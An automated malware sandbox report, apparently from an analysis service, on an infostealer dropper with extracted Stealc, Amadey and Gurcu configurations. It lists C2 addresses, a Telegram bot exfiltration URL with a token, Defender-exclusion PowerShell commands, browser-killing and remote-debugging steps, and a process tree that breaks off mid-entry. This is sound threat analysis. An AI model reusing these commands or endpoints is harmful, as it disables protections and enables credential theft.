Overview

overview

10

Static

static

3

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-12-2024 14:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    1.7MB

  • MD5

    9c3238954fe782af3865837bc2f80cab

  • SHA1

    acd8239f883cb957cd3c969a7ca14180f58e5fba

  • SHA256

    a453c064eb69a8c5db81ded5e039f3d896e9829b367713a7f3f6e0043eb097dd

  • SHA512

    28796a354bffd92c570bce7f7886de14f7e088fb96f6aa6eb3bcf4adc9f4eff6a49aa76cc9081910269b0f3ceed215b413d99f451e09802a574185cb8c45a200

  • SSDEEP

    24576:TKRAjGbMr5DsgPElw9Yb90JYXyd1xNDXhyX9sJphGgOEThXaxt9tsy++xNdXuQ3x:mFmdhZ9YbyOydDjyX9w/Th6ayFdXuc

Score
10/10
amadeygurculummastealc9c9aa5drumcredential_accessdiscoveryevasionexecutionpersistencespywarestealertrojan

Malware Config

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7912788699:AAGD1HW4P2288HKKYEhpShtetd37D8GqFZo/sendDocument?chat_id=7781867830&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Gurcu family
    gurcu
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

    stealergurcu
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    evasiontrojan
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
    evasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 19 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 5 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 15 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 5 IoCs
    evasion
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 3 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2588
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
      2⤵
      • Uses browser remote debugging
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4988
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa3031cc40,0x7ffa3031cc4c,0x7ffa3031cc58
        3⤵
          PID:1084
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1980,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1976 /prefetch:2
          3⤵
            PID:3256
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1864,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2156 /prefetch:3
            3⤵
              PID:4040
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2300,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2524 /prefetch:8
              3⤵
                PID:3716
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1
                3⤵
                • Uses browser remote debugging
                PID:216
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3244 /prefetch:1
                3⤵
                • Uses browser remote debugging
                PID:624
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3988,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3624 /prefetch:1
                3⤵
                • Uses browser remote debugging
                PID:4372
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4816,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3824 /prefetch:8
                3⤵
                  PID:3336
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4956 /prefetch:8
                  3⤵
                    PID:3792
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:8
                    3⤵
                      PID:2068
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5088,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4656 /prefetch:8
                      3⤵
                        PID:4264
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:8
                        3⤵
                          PID:3604
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5224,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:8
                          3⤵
                            PID:1780
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5020,i,7783733690809992566,8596052116454658566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5060 /prefetch:2
                            3⤵
                            • Uses browser remote debugging
                            PID:4576
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                          2⤵
                          • Uses browser remote debugging
                          • Enumerates system info in registry
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                          • Suspicious use of FindShellTrayWindow
                          PID:4984
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa303246f8,0x7ffa30324708,0x7ffa30324718
                            3⤵
                            • Checks processor information in registry
                            • Enumerates system info in registry
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3456
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,9223085278207600798,14211224686792167942,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
                            3⤵
                              PID:3860
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,9223085278207600798,14211224686792167942,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
                              3⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2144
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,9223085278207600798,14211224686792167942,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
                              3⤵
                                PID:3544
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2060,9223085278207600798,14211224686792167942,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                                3⤵
                                • Uses browser remote debugging
                                PID:1908
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2060,9223085278207600798,14211224686792167942,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
                                3⤵
                                • Uses browser remote debugging
                                PID:4536
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2060,9223085278207600798,14211224686792167942,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
                                3⤵
                                • Uses browser remote debugging
                                PID:228
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2060,9223085278207600798,14211224686792167942,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
                                3⤵
                                • Uses browser remote debugging
                                PID:2680
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\CAAEBFHJJD.exe"
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:3640
                              • C:\Users\Admin\Documents\CAAEBFHJJD.exe
                                "C:\Users\Admin\Documents\CAAEBFHJJD.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4868
                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                  4⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Adds Run key to start application
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:732
                                  • C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"
                                    5⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:216
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1516
                                      6⤵
                                      • Program crash
                                      PID:4104
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1548
                                      6⤵
                                      • Program crash
                                      PID:3348
                                  • C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe"
                                    5⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:400
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1F99.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp1F99.tmp.bat
                                      6⤵
                                        PID:4916
                                    • C:\Users\Admin\AppData\Local\Temp\1012026001\CxOJE6t.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1012026001\CxOJE6t.exe"
                                      5⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Modifies registry class
                                      PID:3592
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe"
                                        6⤵
                                        • Checks computer location settings
                                        • System Location Discovery: System Language Discovery
                                        PID:3976
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\MsContainer\zXrLq55h.bat" "
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:740
                                          • C:\MsContainer\chainportruntimeCrtMonitor.exe
                                            "C:\MsContainer/chainportruntimeCrtMonitor.exe"
                                            8⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Drops file in Program Files directory
                                            • Drops file in Windows directory
                                            • Modifies registry class
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3564
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\D5CB943E-34B5-4AB4-9E81-6354A9C511C5\System.exe'
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4480
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\taskhostw.exe'
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1936
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\PackageManifests\dllhost.exe'
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3232
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\StartMenuExperienceHost.exe'
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2188
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MsContainer\RuntimeBroker.exe'
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2656
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YVmpzJqYBd.bat"
                                              9⤵
                                                PID:4640
                                                • C:\Windows\system32\chcp.com
                                                  chcp 65001
                                                  10⤵
                                                    PID:2668
                                                  • C:\Windows\system32\w32tm.exe
                                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                    10⤵
                                                      PID:4252
                                                    • C:\Windows\CbsTemp\StartMenuExperienceHost.exe
                                                      "C:\Windows\CbsTemp\StartMenuExperienceHost.exe"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5232
                                          • C:\Users\Admin\AppData\Local\Temp\1012034001\741c90b42b.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1012034001\741c90b42b.exe"
                                            5⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4664
                                          • C:\Users\Admin\AppData\Local\Temp\1012035001\0947894c84.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1012035001\0947894c84.exe"
                                            5⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:60
                                          • C:\Users\Admin\AppData\Local\Temp\1012036001\d070d518d7.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1012036001\d070d518d7.exe"
                                            5⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4768
                                          • C:\Users\Admin\AppData\Local\Temp\1012037001\8b4152a18f.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1012037001\8b4152a18f.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            PID:864
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM firefox.exe /T
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1276
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM chrome.exe /T
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2816
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM msedge.exe /T
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3188
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM opera.exe /T
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4296
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM brave.exe /T
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4824
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                              6⤵
                                                PID:3792
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                  7⤵
                                                  • Checks processor information in registry
                                                  • Modifies registry class
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:1828
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2004 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {32fad3bb-2910-4bc8-956b-2c2c0b10bd2b} 1828 "\\.\pipe\gecko-crash-server-pipe.1828" gpu
                                                    8⤵
                                                      PID:1936
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2424 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc844f1d-301f-4ee1-9912-e92afc5d2a9d} 1828 "\\.\pipe\gecko-crash-server-pipe.1828" socket
                                                      8⤵
                                                        PID:4712
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
